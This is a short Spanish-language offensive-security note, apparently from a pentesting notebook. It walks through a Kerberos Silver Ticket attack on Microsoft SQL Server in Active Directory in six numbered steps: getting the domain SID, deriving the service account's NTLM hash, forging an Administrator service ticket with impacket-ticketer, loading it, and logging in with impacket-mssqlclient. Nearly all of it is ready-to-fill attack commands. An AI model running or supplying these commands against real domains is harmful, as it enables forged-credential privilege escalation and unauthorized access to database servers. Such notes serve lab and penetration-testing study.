Silver Ticket
Cuando poseemos las credenciales del servicio, a veces podemos llegar ha abusar y generarnos un Silver Ticket Attack. Este consta de lo siguiente, robar el ticket de administrador para el servicio.
MSSQL (Microsoft SQL Server)
Paso 1: Solicitar el SID del dominio
Con Netexec:
netexec ldap $IP -u '<user>' -p '<password>' --get-sidCon Impacket-looksid
impacket-lookupsid <dominio>/'<user>':'<password>'@$IPPaso 2: Sacar el NTLM hash del usuario
Para poder hacer esto, hay que usar la siguiente herramienta.
Para que debuelva el hash, hay que pegar la contraseña en el Input Text y darle a Generate. A continuación se nos habrá generado correctamente y lo podremos ver en el Output Text.
Paso 3: Forjar el Silver Ticket
Con Impacket-ticketer
impacket-ticketer -nthash '<hash NTLM>' -domain-sid '<SID del dominio>' -domain '<dominio>' -spn '<nombre del servicio>/<dominio>:<puerto del MSSQL>@<fqdn del DC>' -user-id 500 AdministratorPaso 4: Generar el archivo krb5.conf
Con Netexec
netexec smb $IP -u '<user>' -p '<password>' --generate-krb5-file /etc/krb5.confPaso 5: Cargar el ticket de Kerberos
export KRB5CCNAME=./administrator.ccachePaso 6: Autentificarse
Con impacket-mssqlclient
impacket-mssqlclient '<fqdn del DC>' -k Last updated
